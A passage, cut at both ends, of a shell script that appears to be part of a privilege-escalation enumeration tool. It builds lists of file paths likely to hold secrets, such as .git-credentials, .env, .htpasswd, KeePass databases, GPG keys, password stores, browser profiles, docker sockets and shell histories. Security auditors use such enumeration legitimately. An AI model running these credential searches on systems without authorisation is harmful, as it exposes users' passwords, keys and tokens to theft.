"$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -v -E '/lib' | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "secrets\.yml$|gitlab\.yml$|gitlab\.rm$" | sort | uniq | head -n 70) + PSTORAGE_PGP_GPG=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -v -E 'README.gnupg' | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E ".*\.pgp$|.*\.gpg$|.*\.gnupg$" | sort | uniq | head -n 70) + PSTORAGE_CACHE_VI=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E ".*\.swp$|.*\.viminfo$" | sort | uniq | head -n 70) + PSTORAGE_DOCKER=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "docker\.socket$|docker\.sock$|Dockerfile$|docker-compose\.yml$" | sort | uniq | head -n 70) + PSTORAGE_FIREFOX=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^" | grep -E "\.mozilla$|Firefox$" | sort | uniq | head -n 70) + PSTORAGE_CHROME=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^" | grep -E "google-chrome$|Chrome$" | sort | uniq | head -n 70) + PSTORAGE_OPERA=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^" | grep -E "com\.operasoftware\.Opera$" | sort | uniq | head -n 70) + PSTORAGE_SAFARI=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^" | grep -E "Safari$" | sort | uniq | head -n 70) + PSTORAGE_AUTOLOGIN=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "autologin$|autologin\.conf$" | sort | uniq | head -n 70) + PSTORAGE_FASTCGI=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "fastcgi_params$" | sort | uniq | head -n 70) + PSTORAGE_SNMP=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "snmpd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_PYPIRC=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "\.pypirc$" | sort | uniq | head -n 70) + PSTORAGE_POSTFIX=$(echo -e "$FIND_DIR_MNT\n$FIND_DIR_CACHE\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_HOMESEARCH" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "postfix$" | sort | uniq | head -n 70) + PSTORAGE_CLOUDFLARE=$(echo -e "$FIND_DIR_MNT\n$FIND_DIR_CACHE\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_HOMESEARCH" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "\.cloudflared$" | sort | uniq | head -n 70) + PSTORAGE_HISTORY=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E ".*_history.*$" | sort | uniq | head -n 70) + PSTORAGE_HTTP_CONF=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "httpd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_HTPASSWD=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "\.htpasswd$" | sort | uniq | head -n 70) + PSTORAGE_LDAPRC=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "\.ldaprc$" | sort | uniq | head -n 70) + PSTORAGE_ENV=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "\.env$" | sort | uniq | head -n 70) + PSTORAGE_MSMTPRC=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "\.msmtprc$" | sort | uniq | head -n 70) + PSTORAGE_INFLUXDB=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "influxdb\.conf$" | sort | uniq | head -n 70) + PSTORAGE_ZABBIX=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32\n$FIND_DIR_MNT\n$FIND_DIR_CACHE\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_HOMESEARCH" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "zabbix_server\.conf$|zabbix_agentd\.conf$|zabbix$" | sort | uniq | head -n 70) + PSTORAGE_GITHUB=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "\.github$|\.gitconfig$|\.git-credentials$|\.git$" | sort | uniq | head -n 70) + PSTORAGE_SVN=$(echo -e "$FIND_DIR_MNT\n$FIND_DIR_CACHE\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_HOMESEARCH" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "\.svn$" | sort | uniq | head -n 70) + PSTORAGE_KEEPASS=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E ".*\.kdbx$|KeePass\.config.*$|KeePass\.ini$|KeePass\.enforced.*$" | sort | uniq | head -n 70) + PSTORAGE_PRE_SHARED_KEYS=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E ".*\.psk$" | sort | uniq | head -n 70) + PSTORAGE_PASS_STORE_DIRECTORIES=$(echo -e "$FIND_DIR_MNT\n$FIND_DIR_CACHE\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_HOMESEARCH" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "\.password-store$" | sort | uniq | head -n 70) + PSTORAGE_FTP=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E ".*\.ftpconfig$|ffftp\.ini$|ftp\.ini$|ftp\.config$|sites\.ini$|wcx_ftp\.ini$|winscp\.ini$|ws_ftp\.ini$" | sort | uniq | head -n 70) + PSTORAGE_BIND=$(echo -e "$FIND_DIR_MNT\n$FIND_DIR_CACHE\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_HOMESEARCH" | grep -E "^/var|^/usr|^/etc" | grep -E "bind$" | sort | uniq | head -n 70) + PSTORAGE_SEEDDMS=$(echo -e "$FIND_DIR_MNT\n$FIND_DIR_CACHE\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_HOMESEARCH" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "seeddms.*$" | sort | uniq | head -n 70) + PSTORAGE_DDCLIENT=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "ddclient\.conf$" | sort | uniq | head -n 70) + PSTORAGE_KCPASSWORD=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "kcpassword$" | sort | uniq | head -n 70) + PSTORAGE_SENTRY=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32\n$FIND_DIR_MNT\n$FIND_DIR_CACHE\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_HOMESEARCH" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "sentry$|sentry\.conf\.py$" | sort | uniq | head -n 70) + PSTORAGE_STRAPI=$(echo -e "$FIND_DIR_MNT\n$FIND_DIR_CACHE\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_HOMESEARCH" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "environments$" | sort | uniq | head -n 70) + PSTORAGE_CACTI=$(echo -e "$FIND_DIR_MNT\n$FIND_DIR_CACHE\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_HOMESEARCH" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "cacti$" | sort | uniq | head -n 70) + PSTORAGE_ROUNDCUBE=$(echo -e "$FIND_DIR_MNT\n$FIND_DIR_CACHE\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_HOMESEARCH" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "roundcube$" | sort | uniq | head -n 70) + PSTORAGE_PASSBOLT=$(echo -e 